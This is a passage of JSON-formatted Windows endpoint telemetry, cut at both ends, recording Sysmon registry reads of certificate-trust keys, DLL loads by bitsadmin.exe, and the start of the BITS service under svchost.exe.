"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "c:\\windows\\system32\\svchost.exe -k netsvcs -p -s BITS", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 3980, - "ppid": 568, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "create", - "timestamp": 131883570876860016, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3980, - "process_name": 